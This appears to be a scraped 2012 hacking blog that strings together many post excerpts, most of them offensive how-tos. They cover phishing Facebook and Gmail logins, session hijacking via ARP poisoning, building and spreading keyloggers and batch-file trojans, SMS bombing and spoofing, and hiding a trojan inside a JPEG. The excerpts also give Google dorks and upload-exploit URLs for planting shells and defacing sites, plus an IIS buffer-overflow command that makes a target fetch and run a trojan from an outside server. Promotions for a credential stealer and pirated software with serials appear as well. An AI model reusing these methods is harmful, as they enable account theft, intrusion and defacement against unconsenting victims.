Monday, December 31, 2012

SSH back door

Many times I'll be at a site where I need remote support from someone who is blocked on the outside by a company firewall. Few people realize that if you can get out to the world through a firewall, then it is relatively easy to open a hole so that the world can come into you.
In its crudest form, this is called "poking a hole in the firewall." I'll call it an SSH back door. To use it, you'll need a machine on the Internet that you can use as an intermediary.
In our example, we'll call our machine blackbox.example.com. The machine behind the company firewall is called ginger. Finally, the machine that technical support is on will be called tech. Figure 4 explains how this is set up.

Figure 4. Poking a hole in the firewall
Poking a hole in the firewall
Here's how to proceed:

Tuesday, July 10, 2012

Session ID Analysis

In this tutorial we focus on session ID analysis. If you are not familiar with session ID’s I’ll do a quick explanation. HTTP is a stateless protocol, so it’s equivalent to walkie talkies or CB radios. You’ll send a request and wait for a reply, you don’t have a constantly open communication line as you would with a phone. So in order to emulate this open communication the HTTP protocol uses session ID’s, commonly known as cookies. These cookies are simply agreements between you and the web application that you are who you claim to be. Once you have exchanged your cookie with the website you can then talk back and forth as long as the cookie is tied to your communication. So there’s the quick and dirty intro to session ID’s. So the next logical question is how does this session ID process work or even better how should it work? Let’s use a web mail application as an example:
  1. You login to your web mail account
  2. Your web mail provider sends you a “random” cookie that is tied to your login session
  3. Each time you click on a new message within your Inbox your cookie is sent along to validate who you claim to be, that way you’ll get your next message and not another person’s message.

Speaking Leet : Language of Hackers

To speak leet, you more or less need to un-learn proper english. The history of leet goes back to the early days of online message boards, or forums, where users can post messages to carry on a threaded conversation. In an attempt to “Clean-Up” the language that users would sometimes post, admins added a filtering system to the message board which would replace restricted words with some type of alternative. For example, the word “crap” might become “crud.” It didn’t take people long to figure out that you could get around this filter simply by altering the original word somehow, like changing “crap” to “c-r-a-p” or “krap” or “crrrap.” it was soon obvious that these filtering systems could never possibly cover every variation because people would just keep inventing new ones, and so leet was born.

How to find or remove the Virus ?

How to find or remove the Virus ?
If you’ve let your guard down–or even if you haven’t–it can be hard to tell if your PC is infected. Here’s what to do if you suspect the worst.
Heard this one before? You must run antivirus software and keep it up to date or else your PC will get infected, you’ll lose all your data, and you’ll incur the wrath of every e-mail buddy you unknowingly infect because of your carelessness.
You know they’re right. Yet for one reason or another, you’re not running antivirus software, or you are but it’s not up to date. Maybe you turned off your virus scanner because it conflicted with another program. Maybe you got tired of upgrading after you bought Norton Antivirus 2001, 2002, and 2003. Or maybe your annual subscription of virus definitions recently expired, and you’ve put off renewing.
It happens. It’s nothing to be ashamed of. But chances are, either you’re infected right now, as we speak, or you will be very soon.

Resetting Ubuntu 11.10 Password

Hey Guys,
If you’ve forgotten your Ubuntu 11.10 Password you can reset it within minutes. I will tell you two methods to reset your Ubuntu Password. The first one is by booting it in recovery mode and second one is by using any Live OS.

Let’s start with the recovery mode first as it takes less time and easy to do in comparison to the second one method:

Boot up your Ubuntu. Press and Hold ‘Shift’ Key while the machine is booting. You will get the GRUB Menu like this:



Select the second option which is ‘Recovery Mode’ and press Enter. After pressing enter system will start booting and you will get a list of options like this:

Internet Access In Backtrack Virtual Machine

Hey Guys,
I’ve found that some people are struggling hard to access internet in there backtrack virtual machine from their USB Modem, so today I am going to tell you how you can access internet in your virtual machine by your datacard.
Open Network Adapter Settings ( Run -> ncpa.cpl )
Right Click on your USB Modem Adapter and go to properties.




Cracking Linux Password when Grub cannot be changed

in the previous post we learnt about cracking Linux Password using the Grub – Dropping to Single User Mode. However, if the Grub is password protected, then this method will not work. So in such cases, we can use the Linux Live CD to crack the Linux Password. Follow the below given steps to change the Linux Password, using the Linux Live CD.
  1. Boot your computer from your Linux Live CD, choosing “Try Linux without any change to your computer” from the boot menu.

BackTrack 5 Released – The Most Advanced Linux Security Distribution & LiveCD

We have of course been following BackTrack since the very early days, way back in 2006 when it was just known as BackTrack – A merger between WHAX and Auditor.  They’ve come a long way and BackTrack is now a very polished and well rounded security distro, most of the others have dropped off the map leaving BackTrack as the giant in the security LiveCD space.
The last major release was BackTrack Final 4 Released – Linux Security Distribution – back in January 2010.

The BackTrack Dev team has worked furiously in the past months on BackTrack 5, code name “revolution” – they released it on May 10th. This new revision has been built from scratch, and boasts several major improvements over all our previous releases. It’s based on Ubuntu Lucid LTS – Kernel 2.6.38, patched with all relevant wireless injection patches. Fully open source and GPL compliant.

Monday, July 9, 2012

How To Hack Facebook Account Using Wireshark

In this tutorial we will have out look on how you can hack facebook account using wireshark. First of all I must clear you even though you'll get access to victim's account you'll not get his/her password, next this trick will work only on LAN with hub. It will also work on LAN with switch but you'll have to perform ARP poisoning, click on link to know more.
Here surely I 'll not discus how to use wireshark please read our previous tutorials to know how to use wireshark.

For this hack you'll need wireshark which is a packet sniffing tool, Mozilla Firefox web browser and add n edit add-on for Mozilla Firefox. Now I assume you have all above components for hacking facebook and you are connected in a hub based LAN or LAN which has been ARP poisoned. So now click on capture button and start capturing packets.

What Is Phishing

Here in this post we will discus a little about what is phishing. Please note what we are covering here is just basics and not a phishing tutorial. In phishing attack, an attacker creates a fake login page of a legitimate website and lures victim to login using it. The site under attack is known as phished site and the fake login page used for capturing or stealing information is known as phished page. To perform phishing attack an attacker performs following steps,
First of all he gets a free web host and then selects a domain which somehow resembles the site he wants to phish. For example to hack Gmail password he/she may select domain like Gmial. Look carefully both words appear nearly similar when just overlooked and that is where an attacker makes a catch.

How To Hack Facebook Account | Phishing

In this tutorial we will discus how you can hack Facbook account password by phishing. Phishing is act of creating a replica of legitimate website for stealing passwords and credit card numbers etc. Here I will show you how you can create replica of facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password
.
First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “Facebook” in file name and select “web page complete” from save as menu. Once done you will have a file named “Facebook.html” and a folder named “Facebook_files”. Folder will have several files in it, let them as it is and open Facebook.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.

JSON XSRF Attacks


Welcome to another episode of Cross Site Request Forgery Attacks on DEVILS BLOG ON SECURITY. In this post we will discus a little about JSON hacking. Now you might have question why we haven't covered JSON XSRF attacks along with other XSRF attacks. This question is little difficult to answer but here's my explanation. All other XSRF attacks usually depend on session management attacks in one or another way, directly or indirectly XSRF attacks can be called as derivative obtained by adding and integrating Session Management Attacks, Frame Injection Flaws and Cross Site Scripting whereas the case is little different in JSON XSRF attacks. Many professionals even object inclusion of JSON attack as XSRF attack but we have nothing to do with it. So lets see how JSON XSRF attacks are different from other XSRF attacks.

JSON XSRF Attacks


In our last post on JSON XSRF attacks we saw some basics about XSRF attacks. So now in this section we will have our look on how to find and exploit JSON vulnerability for attack. As told in previous post JSON vulnerability exists when JSON data transfer format is used instead of standard XML data transfer format and that happens only in AJAX based web applications so following are your steps to find out whether a site is vulnerable or not.


  • If the web application is running on AJAX then check for response type of application for JSON format or Java Script.
  • Now determine whether a cross domain request can be made from it or not. If yes, check for transferred parameters, if they are same for each request or they are predictable then web application is vulnerable

SSL And TLS Attacks | SSL Man In The Middle

In our last post we discussed a little about attacking weak ciphers in this post we will have our look on how a Man In The Middle (MITM) attacks can be performed over SSL and TSL encrypted data transfer. The attack uses SSL strip developed by Moxie Marlin Spike with a ARP spoofing tool and a packet sniffer. The attack can be exclusively performed from UNIX and Linux based platforms hence I suggest you to use Dsniff. Practically SSL strip was developed to demonstrate how an attacker can lead visitors to visit his/her site from legitimate site. The attack used misinterpretation of null characters vulnerability which existed in several certificates during 2009.


I think its not good to demonstrate how attack can be performed since Moxie Marlin Spike has already provided a nice tutorial on his own website with a video. 

Cross Site Scripting (XSS) | The Basics


In this following post we will have some basic look over Cross Site Scripting. Cross site scripting is also known as XSS and many times people also abbreviate it as CSS (by the way CSS means Cascading Style Sheets). Commonly XSS is web application attack and not web server attack, it occurs in web application which accepts input without validation and sanitization resulting giving an attacker chance to run a malicious script. XSS vulnerability occurs in a web application due to dynamic nature of a web page which is attained by Java Scripts, VB Scripts, ActiveX controls, Flash contents and scripts and sometimes with help of HTML too.

Making your own trojan in a .bat file

Open a dos prompt we will only need a dos prompt , and windows xp…
-Basics-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok
Now insert this command: net
And you will get something like this
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send
We will select some of those commands and put them on a .bat file.
What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:

Sunday, July 8, 2012

Hack a Website Using Remote File Inclusion




Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.

Friday, June 29, 2012

Google trick to find private pictures!

Maybe you are a "voyeur".

Maybe you need some pictures for your school work.

Of course you can go to a dedicated website where you can find lot of free pictures.

But you can also dig some private pictures directories.

Try this little code in Google, you may find lot of Non public pictures
 
Quote:
intitle:index.of +"Indexed by Apache::Gallery"
search by adding a word at the end, for example:

Hack about 80% of every website out there


All right,
You kids need to stop asking for someone else to hack your "friends" forum, your girlfriends myspace page, etc.

You want to learn to hack, stop asking stupid questions.

There is ONE tool, that was created originally to protect from hackers. Unfortunately, it's one of the best friends a hacker will ever have :

It's called Acunetix.

Acunetix is a tool that scans websites for known vulnerabilities. It will list all possible sql, xss, html injections, all java injections, all passwords and database weaknesses, all ftp weaknesses, etc. All form submissions exploits that the website can be targeted with. Remote upload and download vulnerabilities.

Beaver's SMS Bomber Pro

Features Include:
Full Feature List:
Custom SMTP Server (Make Sure You Type It Right)
Custom Carrier Gateway (If Your Victims Gateway Is Not In The Large List You May Find And Enter it Yourself)
Custom Number Of SMS To Send (Finally Have Where You Can Enter Any Amount To Send)
Save/Load Settings (Will Save Everything You Enter In The Fields, Restarting Your Computer Will Lose The Saved Settings)
Fixed XP GUI Issues
Stop Bombing At Any Time
Watch The Number Of SMS Sent In The Title Bar
No Longer Freezes While Sending
Added A Recent slave's Box Where You Can Select An Entry And Right-Click It To Bomb It Again Or Delete It From The List
Save/Load Recent Victims List

Use SSH Tunneling to surf net invisibly

Unable to surf net over work/college ? Want to surf net invisibly ? Well,we have a solution for that,SSH Tunneling.An SSH tunnel is an encrypted tunnel created through an SSH protocol connection. SSH tunnels may be used to tunnel unencrypted traffic over a network through an encrypted channel.In easy language,you can surf net without being monitored and even surf blocked sites too.SSH Is pretty awesome.

Without leaving your seat,you have a way to control a computer which ay be located anywhere on this planet.SSH Tunneling

{Linux} Tips and Tricks

Are you a unix geek ? Here are both indispensible linux tips and tricks which are staleness for new and knowledgeable users alike.Lets change a aspect at them-More Linux Tips and tricks for geeks and newbies alike

Hurrying up your alcoholic journeying

Get faster file dealings by using 32-bit transfers on your cruel force

Conscionable add the line:

    hdparm -c3 /dev/hdX

to a bootup script.If you use SuSE or remaining distros based on SYS V,

Learn How To Hack Web Servers


Hacking Tool: IISHack.exe

iishack.exe overflows a buffer used by IIS http daemon, allowing for arbitrary code to be executed.
 
c:\ iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe
www.yourtarget.com is the IIS server you're hacking, 80 is the port its listening on, www.yourserver.com is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.
 
"IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with .HTR extensions. A hacker sends a long URL that ends with ".HTR". IIS interprets it as a file type of HTR and invokes the ISM.DLL to handle the request. Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS, which is privileged. For example, it is relatively simple to include in the exploit code a sequence of commands that will open a TCP/IP connection, download an executable and then execute it. This way, any malicious code can be executed.

Speed Up Windows


Safely turn Off Windows Services To speed up Windows

Some of the windows services starts with the windows eating up the memory. and if they are not used by you then you can stop them from starting with windows. You can re-enable them when you need it.


To check the services program...goto

start -> run ->type" services.msc " (without quotes) -> and hit enter.

There will be a list of services...Some common services you can check and stop them according to your need..

Hack Gmail Accounts

Today i will explain you How to hack Gmail account step by step. In my previous article i have explained you the basic technique involved in hacking Gmail account or password but not explained that in extended way but today i will disclose you how the hackers really hack the gmail account or gmail password using fake pages or simply called Phish pages and the technique involved is called Phising.

NOTE: THIS IS FOR EDUCATIONAL PURPOSES ONLY. DON'T MISUSE IT.





RAR Password Recovery Magic 6.1.1.378 Full




 

RAR Password Recovery Magic is a powerful tool designed to recover lost or forgotten passwords for a RAR/WinRAR archives. RAR Password Recovery Magic supports the customizable brute-force and dictionary-based attacks.RAR Password Recovery Magic has an easy to use interface.

RAR Password Recovery Magic 6.1.1.378.Incl.Serial


Download : | FileSonic | DepositFiles | Turbobit |

Send Sms From Friends MobileTo Any Number

Hello Friends, today i am sharing an awesome trick with you all. Today i will tell you how to send anonymous SMS i.e. How to send SMS from any mobile number to any mobile number that means how to send SMS from your friend's mobile to your mobile or your friends mobile to your friends mobile or any other number. Basically this technique is call SMS spoofing. By SMS spoofing we can send SMS to any mobile using anyone's mobile number. How this trick can be helpful?? its simple it is helpful when you wanna prank your friends, enemies or simply you want to send free SMS to your friends using their numbers only. So friends read on...

Hiren's Bootcd 12.0 + Keyboard Patch




Hiren's BootCD is a live CD containing various diagnostic programs such as partitioning agents, system performance benchmarks, disk cloning and imaging tools, data recovery tools, MBR tools, BIOS tools, and many others for fixing various computer problems.[2] As it is a bootable CD, it can be useful even if the primary operating system cannot be booted. Hiren's Boot CD has an extensive list of software. Utilities with similar functionality on the CD are grouped together and seem redundant; however, they present choices through different UIs and options in what they can do. Hiren's Boot CD also provides the option to boot in "Mini XP Mode," a very simple, but usable, version of XP with all of Hiren's tools available.

USB Disk Security v5.4.0.12 Final


USB Disk Security provides 100% protection against any threats via USB drive, however, the majority of other products are unable even to guarantee 90% protection. USB Disk Security is the best antivirus software to permanently protect offline computer without the need for signature updates, but other antivirus software should update signature database regularly, and they cannot effectively protect offline computer. This light and easy to use solution is 100% compatible with all software and doesn't slow down your computer at all. You pay USB Disk Security once and get it all, however, other antivirus products should be paid for updates every year.

Reset Windows Password Advanced Edition v1.2.1.195 Retail




Lost password or locked Windows account is the most frequent problem data recovery specialists have to deal with. You could format the hard drive or reinstall your operating system, but that wouldn't keep you from partial loss of data, personal settings and extra headache. Besides, all that can take some time. There is a quicker and more elegant way out of this situation. Just run Reset Windows Passwords from a bootable CD or USB and reset the forgotten password or unlock the account. It's a matter of a few minutes! Reset Windows Password is the most powerful solution for recovering or resetting all types of Windows account passwords: user', administrator, Active Directory accounts, and domain administrators.

Registry Purify 5.14 Final




Registry Purify analyze and clean invalid entries in Windows registry, backup and restore entire registry in system file level, compact registry to gain efficiency.

Main Features:
? New Scan Engine
Registry Purify improves analyzing speed over 50% than normal algorithm by using new "SharpANA Engine". Meanwhile, "SharpANA Engine" reduces reading of hard disk evidently, which protects your hard disk effectively. The proper use of multithread technology, reduces consumption of system resources.

Protect Folder 3.2.1.0 Final




 

Protect Folder 3.2.1.0 Full Version

Encrypt your files and data on-the-fly with a secure password. Protect Folder provides on-the-fly protection of your files, folders and removable drives. No need to run anything to access encrypted folders. Just double-click on a protected folder and enter your password, and you can access your protected data completely transparently - exactly as you would access any other file or folder.

How to run JPG as an EXE


I have searched on this forum and have not found this method anywhere so I decided to post it. Note I have used this method for years and it works on every Windows OS.

Requirements:
Windows
Your EXE.


Step 1 :

First things make a New Folder


[Image: Screen_shot_2011-02-24_at_11.34.20_PM.png]

How to Enable Right Click in Websites

How to Enable Right Click in Websites

You are probably sometimes tried to save images or copy the contents of the website that forbid their use of the right-click. Most websites use javascript to prohibit the use of the right-click , so to enable it you should disable the javascript.
There are many ways to do ti , the simplest by my opinion is using Web Developer 1.1.9 , firefox add-on .

1) Downlaod Web Developer 1.1.9 Download it from this link

2) Click Disable button
[Image: disable-.jpg]

3) Select Disable Javascript
[Image: disable-javascript-.jpg]

4) Again select “All Javascript” option.
[Image: all-javascript.jpg]

How To Hack Websites And WebServers


Before you hack a system, you must decide what your goal is. Are you hacking to put the system down, gaining sensitive data, breaking into the system and taking the 'root' access, screwing up the system by formatting everything in it, discovering vulnerabilities & see how you can exploit them, etc ... ? The point is that you have to decide what the goal is first.
Download Tutorial How to Hack Webservers
The most common goals are:

1. breaking into the system & taking the admin privileges.
2. gaining sensitive data, such as credit cards, identification theft, etc.

You should have all of your tools ready before you start taking the steps of hacking. There is a Unix version called backtrack. It is an Operating System that comes with various sets of security tools that will help you hack systems (penetration tests).

Tuesday, June 5, 2012

Manually Hide any file in JPEG

Hello Friends, today i will explain you how to hide any file behind the JPEG image manually that is without any software. Its a very easy trick and also very useful if you want to send information secretly to your friend. Also its different from stenography as it does hides text behind images or text behind mp3 files. Its universal, you can hide any file, virus or Trojan or anything behind image using this trick


Things that you will need for this trick:
1. Winrar installed on your system.
2. Little knowledge of command prompt.

Tuesday, May 15, 2012

Hack facebook password remortly

Hacking Facebook account is very easy and just requires not more than 10 minutes of work. Don't worry i will also tell you how to protect your facebook account or passwords from such hacks and hackers. But for this you must know how hackers hack your facebook account. So first i teach you how to hack facebook account remotely and then i will tell how to protect yourself from this.

So guys lets start hacking Facebook account or passwords....


Steps to hack Facebook account using Keylogger:

1. Creating the Keylogger Server to hack Facebook passwords.
2. Extracting the Icon from installer.
3. Bind the keylogger server with any software setup.
4. How to spread your keylogger or send it to your friends to hack their Facebook accounts or passwords.


Step 1. Creating the Keylogger Server

1. Download the keylogger.
Download

Pesca 0.75 local stealer Ftp+Mail+Php Uploader + Php logger



Steals:

MSN Messenger
* Windows Messenger
* Windows Live Messenger
* Yahoo Messenger (5.x and 6.x)
* Google Talk
* ICQ Lite 4.x/5.x/2003
* AOL Instant Messenger (v4.6,6.x,Pro)
* Trillian
* Miranda
* GAIM/Pidgin
* MySpace IM
* PaltalkScene
* Outlook Express
* Microsoft Outlook 2000

Mr.Dark Soul's Wordpress Blog Hacker

Its a Wordpress hacking software named  Mr.Dark Soul Wordpress Blog Hacker.its a Special Soft For Newbie who wanna hack WP blog .Scrreenshot is enough for teaching that how to use Mr.Dark Soul Wordpress Blog Hacker


Click On Images For Larger Size or its Image Links 
http://i.imgur.com/BCXFD.gif
http://i.imgur.com/ywccU.gif
http://i.imgur.com/dhn43.gif
http://i.imgur.com/yJxc2.gif

[Image: BCXFD.gif]

Another Eeasy Method of wordpress Blog Hacking (Wordpress Easy Comment)

So its a New Tut of Wordpress Blog Hacking,,, Lets Start ...
Open Google.com and enter This Dork
inurl:"fbconnect_action=myhome"
[Image: untitled24.JPG]
You will find many sites, Select the site which you are comfortable with.

"Portail Dokeos" deface and Shell Upload vulnerability

Portail Dokeos vulnerability is a Kind of FCK editor remote file upload vulnerability
in this vulnerability hacker can upload a shell. deface page or any file on website without admin username and password


image_2315846.original.jpg (350×350)

Google Dork : "Portail Dokeos 1.8.5"
Exploit :http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability" Upload shell and deface easily

"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability"


computer-virus-iran-power-nuclear.jpg (400×300)


open Google.com and type this dork 
intitle:"QuiXplorer 2.3 - the QuiX project"


you'll see a lot of sites, some big websites are vuln too like haeward university website,
select any website from search results
Vulnerablity


http://[localhost]/[path]/index.php?action=list&order=name&srt=yes




http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
 after Going to this you will saw a file manager 
you can upload your files here